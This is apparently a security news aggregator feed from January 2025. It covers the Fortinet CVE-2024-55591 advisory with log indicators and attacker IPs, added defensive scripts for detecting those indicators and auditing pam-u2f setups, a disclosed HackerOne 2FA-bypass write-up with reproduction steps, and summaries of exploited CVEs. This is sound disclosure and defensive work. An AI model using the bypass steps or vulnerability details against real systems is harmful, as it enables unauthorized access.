· Establishing Secure Sockets Layer Virtual Private Network (SSL VPN) tunnels to access internal networks.
Affected Products and Versions
The vulnerability impacts the following versions of FortiOS and FortiProxy products:
· FortiOS: versions 7.0.0 through 7.0.16 are affected. Versions 7.6, 7.4, and 6.4 are not affected.
· FortiProxy: versions 7.0.0 through 7.0.19 and versions 7.2.0 through 7.2.12 are affected. Versions 7.6 and 7.4 are not affected.
Solution: Upgrade FortiOS to version 7.0.17 or later. Upgrade FortiProxy to version 7.0.20 or 7.2.13 or later.
How Attackers Exploit the Vulnerability
Attackers exploit this vulnerability by sending malicious WebSocket requests to bypass authentication controls. They can target administrative accounts by guessing or brute-forcing usernames. Once access is gained, they perform the following malicious actions:
· Create random user accounts such as "Gujhmk" or "M4ix9f".
· Add these accounts to administrative or VPN groups.
· Use SSL VPN connections to infiltrate the internal network.
Indicators of Compromise (IOCs)
Fortinet has shared some key IOCs that organizations should monitor to identify potential attacks.
Log Entries
Look for the following types of suspicious log entries in your system:
Successful Admin Logins:
type="event" subtype="system" level="information" logdesc="Admin login successful" user="admin" ui="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" msg="Administrator admin logged in successfully from jsconsole"
Unauthorized Configuration Changes:
type="event" subtype="system" level="information" logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" msg="Add system.admin vOcep"
Suspicious IP Addresses
Attackers have been observed using the following IP addresses to launch attacks:
· 45.55.158.47 (most commonly used)
· 87.249.138.47
· 155.133.4.175
· 37.19.196.65
· 149.22.94.37
It's important to note that these IP addresses are not fixed sources of attack traffic; they are often spoofed and may not represent the actual origin.
Recommended Actions
1. Update Immediately
If your organization is using affected versions of FortiOS or FortiProxy, the most effective solution is to upgrade to the latest secure versions. Fortinet has provided tools to assist with upgrading, which can be found on their official site.
2. Mitigations for Immediate Protection
If an upgrade cannot be performed immediately, consider implementing the following mitigations:
· Disable HTTP/HTTPS Administrative Interfaces: This reduces the exposure of management interfaces to the internet.
· Restrict Access with Local-In Policies: Limit access to the administrative interface by allowing only trusted IPs.
· Use Non-Standard Admin Usernames: To make brute-force attacks more difficult, avoid predictable or default usernames for administrative accounts.
Exploitation in the Wild
Reports indicate active exploitation of this vulnerability. Threat actors have been observed creating random administrative or local user accounts, such as:
· Gujhmk
· Ed8x4k
· Alg7c4
These accounts are often added to SSL VPN user groups to establish tunnels into internal networks, making it critical to monitor for unauthorized account creation.
Best Practices for Enhanced Security
· Enable Logging and Monitoring: Continuously monitor system logs for any unauthorized administrative activity, suspicious configuration changes, or unexpected VPN connections.
· Conduct Regular Vulnerability Scans: Perform routine scans to identify and patch other vulnerabilities within your network infrastructure.
· Adopt a Zero Trust Approach: Limit user privileges to the minimum required and enforce strict access controls, especially for administrative tasks.
· Educate Your Team: Ensure that your IT and security teams are aware of this vulnerability and trained to respond to potential threats.
· Implement Multi-Factor Authentication (MFA): Although this vulnerability bypasses traditional authentication, MFA adds an additional layer of security that can mitigate other attack vectors.
Conclusion
The CVE-2024-55591 vulnerability emphasizes the critical need for organizations to stay ahead of emerging threats. With attackers actively exploiting this flaw to gain super-admin access, the risks to your infrastructure and data cannot be overstated. Organizations using FortiOS and FortiProxy must act immediately. Patching systems and implementing mitigations isn't optional; it's imperative. It's not just about reacting to vulnerabilities—it's about adopting a proactive and layered approach to cybersecurity. Leveraging tools like multi-factor authentication, real-time log monitoring, and Zero-Trust architectures can significantly reduce the risk of exploitation.
The broader lesson here is clear: vulnerabilities are inevitable, but breaches don't have to be. By staying informed, investing in advanced threat detection systems, and fostering a security-first mindset within your organization, you can not only address immediate threats but also build resilience against future ones. As cyber threats grow more advanced, are you prepared to meet them head-on? Strengthening your defenses today will determine your security tomorrow. Let this be a reminder to continuously innovate and adapt in the face of an ever-changing threat landscape. Your next step could define the safety of your organization.
Source:
https://www.csa.gov.sg/alerts-advisories/alerts/2025/al-2025-004
https://www.fortiguard.com/psirt/FG-IR-24-535
https://nvd.nist.gov/vuln/detail/CVE-2024-55591
The post Fortinet Zero-Day CVE-2024-55591 Exposed: Super-Admin Access Risk appeared first on Cyble.
by CYBLE
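A defender-side check for the log-entry and source-IP indicators the advisory above lists, added here as an example (not part of the Cyble post and not Fortinet tooling): it parses FortiOS key=value event lines and flags admin logins over the jsconsole channel, admin accounts added through jsconsole, and the listed source addresses. Function and rule names are this example's own, and the sample log lines are constructed, two of them copied from the IOCs above.

```python
"""Scan FortiOS event logs for the CVE-2024-55591 indicators listed in the advisory.

Added example; the function, rule and constant names are this example's own, and
SAMPLE_LOGS is constructed (two lines copied from the advisory's IOC list).
"""
import re
from dataclasses import dataclass

# Source IPs the advisory lists as observed in attacks. The advisory also notes they
# are often spoofed, so a match is a lead to investigate, not proof of compromise.
IOC_SRC_IPS = {
    "45.55.158.47", "87.249.138.47", "155.133.4.175", "37.19.196.65", "149.22.94.37",
}

# FortiOS writes event logs as key="quoted value" or key=bare_value pairs.
_KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_fortios_log(line: str) -> dict[str, str]:
    """Parse one FortiOS key=value log line into a dict, with quotes stripped."""
    fields: dict[str, str] = {}
    for key, raw in _KV_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


@dataclass(frozen=True)
class Finding:
    rule: str    # detection rule that fired (rule names are this example's own)
    detail: str  # the account name or IP the rule keyed on, for the analyst's queue
    line: str    # the raw log line, kept for triage


def check_line(line: str) -> list[Finding]:
    """Apply the advisory's three IOC patterns to one raw log line."""
    fields = parse_fortios_log(line)
    ui = fields.get("ui", "")
    msg = fields.get("msg", "")
    hits: list[Finding] = []
    # 1. Successful admin login over the "jsconsole" UI channel (first IOC above).
    #    Baseline this against your own admins' use of the GUI CLI console.
    if fields.get("logdesc") == "Admin login successful" and ui.startswith("jsconsole"):
        hits.append(Finding("jsconsole_admin_login", fields.get("user", "?"), line))
    # 2. An admin account added through jsconsole: msg="Add system.admin <name>"
    #    (second IOC above). The created name is surfaced for review.
    if (fields.get("action") == "Add" and ui.startswith("jsconsole")
            and msg.startswith("Add system.admin ")):
        hits.append(Finding("jsconsole_admin_account_created",
                            msg.removeprefix("Add system.admin ").strip(), line))
    # 3. Source address on the advisory's list (spoofable; see IOC_SRC_IPS note).
    if fields.get("srcip") in IOC_SRC_IPS:
        hits.append(Finding("ioc_source_ip", fields["srcip"], line))
    return hits


def scan(lines) -> list[Finding]:
    """Run check_line over an iterable of raw log lines and collect every finding."""
    return [f for line in lines for f in check_line(line)]


# Constructed sample input. Lines 1 and 2 are copied from the advisory's IOC list;
# lines 3 and 4 are made up for this example (RFC 5737 documentation addresses).
SAMPLE_LOGS = [
    'type="event" subtype="system" level="information" logdesc="Admin login successful" '
    'user="admin" ui="jsconsole" srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" '
    'msg="Administrator admin logged in successfully from jsconsole"',
    'type="event" subtype="system" level="information" logdesc="Object attribute configured" '
    'user="admin" ui="jsconsole(127.0.0.1)" action="Add" msg="Add system.admin vOcep"',
    # Benign: an ordinary HTTPS GUI login from an internal management host.
    'type="event" subtype="system" level="information" logdesc="Admin login successful" '
    'user="admin" ui="https(192.0.2.10)" srcip=192.0.2.10 dstip=192.0.2.1 action="login" '
    'status="success" msg="Administrator admin logged in successfully from https(192.0.2.10)"',
    # jsconsole login by one of the random account names from the advisory, from a listed IP.
    'type="event" subtype="system" level="information" logdesc="Admin login successful" '
    'user="Gujhmk" ui="jsconsole" srcip=45.55.158.47 dstip=192.0.2.1 action="login" '
    'status="success" msg="Administrator Gujhmk logged in successfully from jsconsole"',
]


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.rule}] {f.detail}: {f.line[:70]}...")
```

Feed it real lines exported from the FortiGate event log (or a syslog collector) in place of SAMPLE_LOGS; the parser handles quoted values with spaces and bare values alike.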
2025-01-20 15:29:25
Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025
Eskenzi PR are proud to announce that KnowBe4, Mimecast, Varonis, Bridewell, Certes, and Pentest Tools have joined BT as sponsors for this year's Most Inspiring Women in Cyber Awards. The 5th annual event, held at the iconic BT Tower on the 26th February 2025, aims to celebrate trailblazers from across the cybersecurity industry who are […] The post Forward-Thinking Industry Leaders Sponsor Most Inspiring Women in Cyber Awards 2025 appeared first on IT Security Guru.
by IT Security Guru
2025-01-20 15:22:23
How I found S3 buckets in Bug bounties
Cloud enumeration and exploitation. Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-20 15:20:25
Bypass HackerOne 2FA requirement and reporter blacklist
Severity: Medium (5.0) — High (7.1)
Weakness: Improper Authorization
Bounty: $10,000

Summary:
First, the initial submission got a bounty of $2,500. But while HackerOne was doing their Root Cause Analysis (RCA) of my report submission, they stumbled upon another vulnerability with High severity. Since my submission gave them a nudge in the right direction, they rewarded me another $7,500 for the increased scope of the finding.

Research:
My routine when I am hunting on the HackerOne main platform is always checking if they have a new incoming feature, and I saw that there is a beta feature called Embedded Submission Form which enables hackers to anonymously submit reports without having to create an account on HackerOne. For additional information, learn more here.
Now, with that new feature I found an Improper Authorization bug that bypasses two security features of HackerOne for bug bounty programs:
Bypass 2FA requirements when submitting new reports to a program. Learn more here.
Bypass hacker blacklisting by a program (when a program does not want to receive reports from specific hackers). Learn more here.

Bypass 2FA requirements when submitting new reports to a program
A program owner can enforce that hackers set up two-factor authentication before submitting new reports to their program here: https://hackerone.com/<program>/submission_requirements (see below image)
Enabled 2FA requirements
The Parrot Sec program has this feature enabled to enforce that hackers set up 2FA before submitting reports. I removed the 2FA on my account to test, and it is good that I was blocked from submitting new reports (see below image).
2FA required by the program before submitting new reports.
Now I was able to bypass this 2FA setup requirement by using the Parrot Sec program's Embedded Submission Form.

Steps to reproduce:
Log in to your account and remove the 2FA on your account (if you already set it up).
Now go to https://hackerone.com/parrot_sec and hit the Submit Report button; observe that you cannot submit a report unless you enable your 2FA.
BYPASS: Get the Embedded Submission URL on their policy page. I got this: https://hackerone.com/<redacted_UUID>/embedded_submissions/new
Now submit a report using that embedded submission form and you can submit reports without setting up your 2FA, despite the program enforcing that users set up 2FA before submitting new reports.
2FA requirements successfully bypassed!

Impact
Users can still submit a report to a program despite the program owner requiring 2FA to be enabled on the account before a hacker can submit reports.

Bypass Hacker Blacklisting by a program
If a hacker’s behavior is out of sync with what is outlined on a bug bounty program's Security Page, or if they’ve violated part of the HackerOne Code of Conduct, program owners can take action to ban hackers from participating in their program. BBP program owners can ban hackers from both private and public programs (see below image). For additional information, learn more here.
Program blacklisting hackers.
So I asked a good friend of mine, Ace Candelario (phspade), to ban my h1/japz account on the HackerOne Parrot Sec program from submitting a new report; btw he is the Philippine Ambassador of Parrot Security and one of the triagers in the Parrot Sec HackerOne program. After banning my account I tried to submit a report, and clicking on the submit report button redirected me to a Page not found error page (see below).
Error page when you are banned from a specific program and try to submit a report.
It’s good; the reason why I cannot submit a new report is because I am banned/blacklisted on the Parrot Sec program. :)
But using the same steps to reproduce as in my first bypass above (Bypassing 2FA requirements), I was able to submit a new report to the BBP program despite already being banned.

Impact
A malicious user can still submit as many reports as he/she wants despite the program owner having banned/blacklisted the hacker.
Note: This second bypass turned out to have the same root cause as the first bypass above, therefore it was closed as a duplicate of my first report #418767.
HackerOne Co-Founder Jobert closed the report as a duplicate because it has the same root cause as the first bug mentioned above.

Disclosure Timeline
2018–10–04 02:41:19 — Report submitted to HackerOne security team.
2018–10–05 20:07:59 — Security team acknowledged and triaged the report.
2018–10–05 20:53:21 — $10,000 bounty rewarded.
2018–10–06 00:38:15 — Fix for the High severity bug released to production, while the fix for the initial submission (Medium) was still ongoing.
2018–10–25 23:11:03 — Fix for the Medium severity bug that was initially reported was released to production.
2018–10–25 23:11:03 — Status: Resolved

Original submission reference: Hacker can bypass 2FA requirement and reporter blacklist through embedded submission form
Shout-out to all Pinoy Bug Bounty Hunters out there! :)
Cheers!
Japz
https://twitter.com/japzdivino
https://instagra
https://www.facebook.com/pinoywhitehat

Bypass HackerOne 2FA requirement and reporter blacklist was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-20 15:03:57
20th January – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 20th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Hotel management platform Otelier has suffered a data breach that resulted in the extraction of almost eight terabytes of data. The threat actors compromised the company’s Amazon S3 cloud storage, stealing guests’ personal information […] The post 20th January – Threat Intelligence Report appeared first on Check Point Research.
by Check Point Research
2025-01-20 15:02:37
Is Carding Still a Thing in 2025
Is the Threat Finally Diminishing? Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-20 15:00:00
Manager as mentor: Learnings from Sysdig’s documentation team
After years in the technical writing trenches at industry giants like Cisco, Riverbed, and Akamai, I now lead the Sysdig... The post Manager as mentor: Learnings from Sysdig’s documentation team appeared first on Sysdig.
by Sysdig
2025-01-20 14:54:49
Cyble Sensors Detect Attacks on Check Point, Ivanti and More
Cyble honeypots have detected vulnerability exploits on Check Point and Ivanti products, databases, CMS systems, and many other IT products.

Overview
Cyble honeypot sensors have detected new attacks on vulnerabilities in Check Point and Ivanti products, among dozens of other vulnerability exploits recently picked up by Cyble sensors. Cyble’s sensor intelligence reports to clients in the first two weeks of 2025 also highlighted new database and CMS attacks. Unpatched Linux systems and network and IoT devices remain popular targets for hackers looking to breach networks and add to botnets. The reports also examined new brute-force attacks and phishing campaigns. Here are some of the highlights.

Vulnerabilities Under Attack
Here are some of the vulnerability exploits detected by Cyble sensors.
CVE-2024-24919 is an 8.6-severity vulnerability affecting Check Point CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances, identified by Check Point as being actively exploited. If successfully exploited, the vulnerability could allow an attacker to access sensitive information on Internet-connected Gateways that have a remote access VPN or mobile access enabled, and potentially move laterally and gain domain admin privileges.
Ivanti had a challenging 2024, with 11 vulnerabilities added to CISA’s Known Exploited Vulnerabilities catalog, trailing only Microsoft, and new vulnerabilities have already been added this year. One particular Ivanti vulnerability that Cyble is detecting attacks on is CVE-2024-7593, a 9.8-severity Ivanti Virtual Traffic Manager (vTM) vulnerability that enables a remote, unauthenticated attacker to bypass admin panel authentication due to a flawed implementation of the authentication algorithm.
Attackers are exploiting CVE-2024-8503, a time-based SQL injection vulnerability in VICIDIAL that could allow an unauthenticated attacker to enumerate database records. By default, VICIDIAL stores plaintext credentials within the database. VICIDIAL is a software suite that works with the Asterisk Open-Source PBX Phone system to create an inbound/outbound contact center.
CVE-2024-7120 is a critical OS command injection vulnerability in the web interface of Raisecom MSG gateways, specifically MSG1200, MSG2100E, MSG2200, and MSG2300 devices running version 3.90. The flaw in the list_base_config.php file allows remote attackers to exploit the template parameter to execute arbitrary commands. Public exploits are available for this vulnerability.
CVE-2024-56145 is a critical vulnerability in Craft CMS systems. If the register_argc_argv setting in php.ini is enabled, this issue affects users of impacted versions, allowing an unspecified remote code execution vector. Users are advised to update to versions 3.9.14, 4.13.2, or 5.5.2. Those unable to upgrade should mitigate the risk by disabling register_argc_argv in their PHP configuration.
Cyble sensors have also identified attackers scanning for the URL "/+CSCOE+/logon.html", which is used to access the login page for the Cisco Adaptive Security Appliance (ASA) WebVPN service. The URL has been found to have various vulnerabilities, including cross-site scripting, path traversal, and HTTP response splitting, which could allow attackers to execute arbitrary code, steal sensitive information, or cause a denial of service.

Brute-Force Attacks
The Cyble sensor reports also include considerable detail on brute-force attacks. These attacks frequently target remote desktops and access systems, with ports 5900 (VNC), 3389 (RDP), and 22 (SSH) being the most frequently attacked ports. Other frequently attacked ports include 3386 (GPRS tunneling), 445 (SMB), and 23 (Telnet). Cyble advises adding security system blocks for frequently attacked ports.

Recommendations and Mitigations
Cyble researchers recommend the following security controls:
Blocking target hashes, URLs, and email info on security systems (Cyble clients receive a separate IoC list).
Immediately patch all open vulnerabilities listed here and routinely monitor the top Suricata alerts in internal networks.
Constantly check for attackers’ ASNs and IPs.
Block brute-force attack IPs and the targeted ports listed.
Immediately reset default usernames and passwords to mitigate brute-force attacks and enforce periodic changes.
For servers, set up strong passwords that are difficult to guess.

Conclusion
With many active threats against both new and older vulnerabilities, organizations need to remain vigilant and responsive, patching quickly and applying mitigations where patching isn’t possible. To protect their digital assets, organizations should address known vulnerabilities and implement recommended security controls, such as blocking malicious IPs and securing network ports. A proactive and layered security approach is critical for defending against exploits and data breaches. To access the full sensor intelligence reports from Cyble, along with IoCs and additional insights and details, click here. The post Cyble Sensors Detect Attacks on Check Point, Ivanti and More appeared first on Cyble.
by CYBLE
2025-01-20 14:50:24
Your location or browsing habits could lead to price increases when buying online
Companies are showing customers different prices for the same goods and services based on what data they have on them, including details like their precise location or browser history.
by Malwarebytes Labs
2025-01-20 14:32:58
From Assessment to Action: The Red Siege Security Posture Review Is Here
At Red Siege, we’ve earned our reputation as a leader in offensive security by delivering expert-driven solutions that prioritize what matters most to CISOs and cybersecurity professionals. From penetration testing […]
by Red Siege Blog
2025-01-20 14:30:00
US Ban on Automotive Components Could Curb Supply Chain
The US Department of Commerce will prohibit the import of components for connected vehicles from China or Russia, as the US continues to ban technology it sees as potential national security threats.
by Dark Reading
2025-01-20 14:00:00
Phishing Attacks Are the Most Common Smartphone Security Issue for Consumers
New hands-on testing results show that most devices are unable to catch phishing emails, texts, or calls, leaving users at risk.
by Dark Reading
2025-01-20 13:03:56
Threat Actors Abuse Google Translate to Craft Phishing Links
Threat actors are abusing Google Translate’s redirect feature to craft phishing links that appear to belong to, according to researchers at Abnormal Security.
by KnowBe4
2025-01-20 13:03:20
Phishing Campaign Attempts to Bypass iOS Protections
An SMS phishing (smishing) campaign is attempting to trick Apple device users into disabling measures designed to protect them against malicious links, BleepingComputer reports.
by KnowBe4
2025-01-20 13:03:07
African firms worry over state cyber safeguards – The Citizen
A recent Global Cybersecurity Outlook report by the World Economic Forum reveals that over 40% of African companies lack confidence in their governments' ability to handle major cybersecurity incidents, a higher percentage than in other global regions. The post African firms worry over state cyber safeguards – The Citizen appeared first on ZENDATA Cybersecurity.
by Zendata
2025-01-20 13:02:32
From Pig Butchering to People Talking
Interpol has recently recommended discontinuing the use of the term "Pig Butchering" in cybercrime discussions, expressing concern that such terminology may discourage victims from reporting incidents due to feelings of shame or embarrassment.
by KnowBe4
2025-01-20 12:45:49
Fintech Bill Pay Platform “Willow Pays” Exposes Over 240,000 Records
Security researcher discovers a non-password-protected database containing over 240,000 records belonging to US-based FinTech bill payment platform Willow…
by Hackread
2025-01-20 11:24:24
Yubico Warns of 2FA Security Flaw in pam-u2f for Linux and macOS Users
Yubico has released a security advisory, YSA-2025-01, which highlights a vulnerability within the software module that supports two-factor authentication (2FA) for Linux and macOS platforms. This issue, tracked as CVE-2025-23013, allows for a partial bypass of 2FA protections when using YubiKeys or other FIDO-compatible authenticators. The vulnerability poses a high-risk security threat and could potentially compromise authentication processes for users relying on Yubico’s open-source pam-u2f software.
Yubico's pam-u2f software package, a Pluggable Authentication Module (PAM) used to integrate YubiKey and other FIDO-compliant devices with Linux and macOS systems, contains a vulnerability that can lead to a 2FA bypass in some configurations. This flaw primarily affects systems running versions of pam-u2f prior to 1.3.1, where the authentication process does not correctly handle certain errors. In particular, when the system experiences issues such as memory allocation errors or the absence of necessary files, the pam-u2f module may fail to trigger proper authentication checks.

The 2FA Bypass Vulnerability
The 2FA bypass vulnerability arises in the pam_sm_authenticate() function, which is responsible for managing the authentication flow. When certain conditions occur—such as failure to allocate memory or privilege escalation issues—the function returns a response of PAM_IGNORE. This prevents the system from completing the authentication process correctly, bypassing 2FA in scenarios where it should be validated. Additionally, if the nouserok option is enabled in the configuration, pam-u2f may return PAM_SUCCESS even when the authfile is missing or corrupted. This presents a critical risk, particularly in configurations where 2FA is set up as the primary or secondary authentication factor.

What Does This Mean for Users?
The vulnerability primarily affects users who have installed pam-u2f on Linux or macOS systems via methods like apt or manual installation. Specifically, users with versions of pam-u2f prior to 1.3.1 are vulnerable to this issue, which may lead to unauthorized access if the system’s 2FA protections are bypassed. However, no hardware used for 2FA, including any YubiKey devices, is affected by this vulnerability. The issue lies entirely within the software configuration, not the hardware security keys.
Yubico has recommended that all affected customers upgrade to the latest version of pam-u2f immediately to mitigate the vulnerability. Users can download the latest release directly from Yubico’s GitHub repository or update via Yubico’s Personal Package Archive (PPA).

How Are Different Configurations Impacted?
The severity of the vulnerability varies depending on the system configuration. For instance:
Single Factor Authentication with User-Managed Authfile: In this scenario, where pam-u2f is used as a single factor and the authfile is located in the user's home directory, an attacker could remove or corrupt the authfile. This would cause pam-u2f to return PAM_SUCCESS, allowing unauthorized access and potentially escalating privileges if the user has sudo access. This scenario has been assigned a CVSS score of 7.3, indicating a high severity.
Two-Factor Authentication with Centrally Managed Authfile: If pam-u2f is used alongside a user’s password for two-factor authentication, the vulnerability may be triggered by a memory allocation error or a lack of necessary files. In this case, the second authentication factor may fail to verify, leaving the system open to attacks. This scenario carries a CVSS score of 7.1.
Use of pam-u2f as a Single Authentication Factor with Other PAM Modules: When pam-u2f is used in conjunction with other PAM modules that do not perform authentication, forcing a PAM_IGNORE response would prevent any authentication from occurring. If the user has administrative privileges, this could lead to local privilege escalation. This scenario also carries a CVSS score of 7.3.

Conclusion
Yubico urges affected customers to immediately upgrade to the latest version of pam-u2f to protect against the 2FA bypass vulnerability, with alternative mitigation measures available for those unable to update right away. This advisory highlights the crucial role of two-factor authentication (2FA) in securing systems, while also showing that vulnerabilities within 2FA solutions can still pose risks.
by The Cyber Express
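As an added example (my own code, not Yubico's and not from the advisory), the following Python audits a PAM auth stack for the three shapes the article singles out: a pam-u2f version older than 1.3.1, nouserok combined with a user-managed authfile, and a stack in which pam_u2f.so is the only authenticating module. The PAM files it checks are constructed samples; counting an @include line as another module and the home-directory path prefixes are assumptions.

```python
# Added example, not Yubico's code and not from the advisory: audit PAM "auth"
# stacks for the pam_u2f.so configurations the article describes as exposed by
# CVE-2025-23013. The sample PAM files below are constructed for illustration.
import re
from typing import Dict, List, Tuple

FIXED_VERSION = (1, 3, 1)  # the article names 1.3.1 as the fixed release

# "auth <control> <module> [args]"; the control field may be bracketed, e.g.
# "[success=1 default=ignore]", so the line cannot simply be split on spaces.
AUTH_LINE = re.compile(r"^auth\s+(\[[^\]]*\]|\S+)\s+(\S+)\s*(.*)$")


def version_is_vulnerable(version: str) -> bool:
    """True when the installed pam-u2f is older than 1.3.1 ('1.3.0-1' -> (1, 3, 0))."""
    return tuple(int(n) for n in re.findall(r"\d+", version)[:3]) < FIXED_VERSION


def parse_auth_stack(pam_text: str) -> Tuple[List[Dict[str, str]], List[str]]:
    """Return the option dict of every pam_u2f.so auth line and the names of the
    other modules in the auth stack. Bare flags such as "nouserok" map to "".

    Assumption: an "@include" line counts as another module, since on Debian-style
    systems it usually pulls in a password module such as pam_unix.so.
    """
    u2f_entries: List[Dict[str, str]] = []
    other_modules: List[str] = []
    for raw in pam_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if line.startswith("@include"):
            other_modules.append(line)
            continue
        match = AUTH_LINE.match(line)
        if not match:
            continue  # account/password/session lines are irrelevant here
        _control, module, args = match.groups()
        if module.endswith("pam_u2f.so"):
            # "key=value" -> (key, value); a bare flag -> (flag, "")
            options = dict(arg.partition("=")[::2] for arg in args.split())
            u2f_entries.append(options)
        else:
            other_modules.append(module)
    return u2f_entries, other_modules


def authfile_is_user_managed(authfile: str) -> bool:
    """No authfile option means pam_u2f reads a per-user file under $HOME; paths
    under a home directory are treated the same (assumption about the layout)."""
    return authfile == "" or authfile.startswith(("~", "$HOME", "/home/", "/Users/"))


def audit_pam_text(pam_text: str, installed_version: str) -> List[str]:
    """Findings for one PAM file; an empty list means none of the article's
    scenarios matched."""
    findings: List[str] = []
    if version_is_vulnerable(installed_version):
        findings.append(f"pam-u2f {installed_version} is older than 1.3.1: upgrade")
    u2f_entries, other_modules = parse_auth_stack(pam_text)
    for options in u2f_entries:
        if "nouserok" in options and authfile_is_user_managed(options.get("authfile", "")):
            findings.append(
                "nouserok with a user-managed authfile: a removed or corrupted "
                "file makes pam_u2f return PAM_SUCCESS (the CVSS 7.3 scenario)"
            )
        if not other_modules:
            findings.append(
                "pam_u2f.so is the only authenticating module in this stack: a "
                "PAM_IGNORE result leaves no factor to verify (the CVSS 7.3 scenario)"
            )
    return findings


# Constructed sample: single factor, nouserok, per-user authfile (the exposed shape).
WEAK_SUDO = """\
auth required pam_u2f.so nouserok cue
"""

# Constructed sample: password first, then pam_u2f with a centrally managed
# authfile and no nouserok; the bracketed control field exercises the parser.
HARDENED_SUDO = """\
auth required pam_unix.so
auth [success=1 default=die] pam_u2f.so authfile=/etc/u2f_mappings cue
auth required pam_deny.so
"""

if __name__ == "__main__":
    print("weak:", audit_pam_text(WEAK_SUDO, "1.3.0"))
    print("hardened:", audit_pam_text(HARDENED_SUDO, "1.3.1") or "no findings")
```

Point it at the contents of the files under /etc/pam.d together with the version your package manager reports; the version check alone is the decisive one, the configuration findings only tell you which of the article's scenarios you would fall into while still unpatched.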
2025-01-20 11:15:00
Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP
Cybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repositories that come with capabilities to steal data and even delete sensitive data from infected systems. The list of identified packages is below -
@async-mutex/mutex, a typosquat of async-mute (npm)
dexscreener, which masquerades as a library for accessing liquidity pool
by The Hacker News
2025-01-20 11:00:00
The Human Touch in Tech: Why Local IT Support Remains Essential
As automation and AI reshape IT support, local providers continue to shine by offering personalized service, rapid on-site assistance, and creative problem-solving for complex issues.
by ITPro Today
2025-01-20 10:00:00
Hybrid Cloud, AI Emerge as Critical Priorities for IT Leaders in 2025, Rackspace Study Finds
Organizations are increasingly reconsidering where they put their money and workloads in the cloud as AI becomes a new driver.
by ITPro Today
2025-01-20 09:37:50
Budget 2025 on the Horizon: Will India Take the Leap in Enhancing Cybersecurity and Data Privacy?
With Budget 2025 soon to be announced, India stands at a pivotal moment in its digital transformation journey, increasingly relying on digital platforms and technologies for business, governance, and daily life. As the nation's digital ecosystem experiences exponential growth, driven by a surge in mobile applications, the need to enhance its cybersecurity infrastructure has never been more urgent. Sharing his perspective on this vital issue, Manish Mimani, Founder and CEO of Protectt.ai, emphasizes that the Union Budget 2025 offers a pivotal opportunity to strengthen India’s digital and cybersecurity framework. Mimani highlights the need for focused financial reforms, strategic investments, and innovative policies to bolster India’s defenses against growing cyber risks, while fostering a culture of resilience and innovation in the cybersecurity ecosystem. The following key recommendations by Mimani outline how Budget 2025 can play a transformative role in securing India’s digital future:

Budget 2025: What to Expect for Cybersecurity

Establishing Cybersecurity Research & Development (R&D) Hubs in Multiple Cities
The government could allocate funds to establish a dedicated R&D institute focused on cybersecurity. This hub would foster innovation and develop advanced security solutions tailored to India’s unique needs. By nurturing homegrown technologies, India can reduce reliance on foreign solutions and position itself as a global leader in cybersecurity innovation.

Financial Incentives for Cybersecurity Startups
Targeted financial incentives, such as tax holidays, grants, and subsidized loans, could stimulate the growth of startups specializing in cybersecurity. Encouraging innovation in this sector would not only strengthen India’s defenses but also allow the nation to capture a larger share of the growing global cybersecurity market.

Upskilling and Talent Development
Bridging the cybersecurity skills gap is essential for safeguarding India’s digital future. The budget could fund comprehensive training and upskilling programs, including partnerships with educational institutions to develop specialized curricula. Subsidized training for IT professionals and initiatives to attract talent to cybersecurity careers would help ensure a robust pipeline of skilled professionals.

Public-Private Partnerships for Cybersecurity Infrastructure
Allocating budgetary support for public-private partnerships (PPPs) could accelerate the development of shared cybersecurity resources. Collaborative initiatives between the government and private sector would create platforms for threat intelligence sharing, infrastructure development, and advanced research, bolstering India’s ability to counter emerging cyber threats.

Reduction in GST on 100% Made in India Cybersecurity Products
Reducing the Goods and Services Tax (GST) on cybersecurity software and tools could make essential safeguards more affordable for businesses, especially small and medium enterprises (SMEs). Currently taxed at 18%, lowering this rate would enable wider adoption of advanced security solutions, enhancing the resilience of India’s digital infrastructure.

Lower Import Duties on Critical Hardware
High import duties on servers, GPUs, and other essential components inflate the cost of building robust cybersecurity systems. By reducing these duties, the government could make cutting-edge technology more accessible to businesses, enabling real-time threat detection and efficient anomaly analysis across sectors.

Tax Benefits for Cybersecurity Investments
Introducing tax incentives for businesses that implement strong cybersecurity measures could encourage proactive adoption of best practices. Deductions for investments in cybersecurity audits, penetration testing, and advanced security systems would foster a more secure digital ecosystem.

Conclusion
The Union Budget 2025 represents a significant opportunity to bolster India’s cybersecurity capabilities. By adopting strategic measures such as tax incentives, reduced GST rates, and investments in R&D and talent development, the government can create a more resilient and secure digital environment. As businesses and citizens increasingly depend on digital platforms, mobile app security emerges as a critical focus area within the broader cybersecurity landscape. By directing resources and attention to this domain, India can ensure the safety of its digital economy, foster innovation, and maintain its appeal as a global hub for technology and investment.
by The Cyber Express
2025-01-20 09:33:19
Agent vs. Agentless Cloud Security: Why Deployment Methods Matter
Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
by Darktrace
2025-01-20 08:02:57
A week in security (January 13 – January 19)
Last week on Malwarebytes Labs: Last week on ThreatDown: Stay safe!
by Malwarebytes Labs
2025-01-20 00:54:56
Industry Moves for the week of January 20, 2025 - SecurityWeek
Explore industry moves and significant changes in the industry for the week of January 20, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-01-20 00:00:00
ZDI-25-055: Sante PACS Server URL path Memory Corruption Denial-of-Service Vulnerability
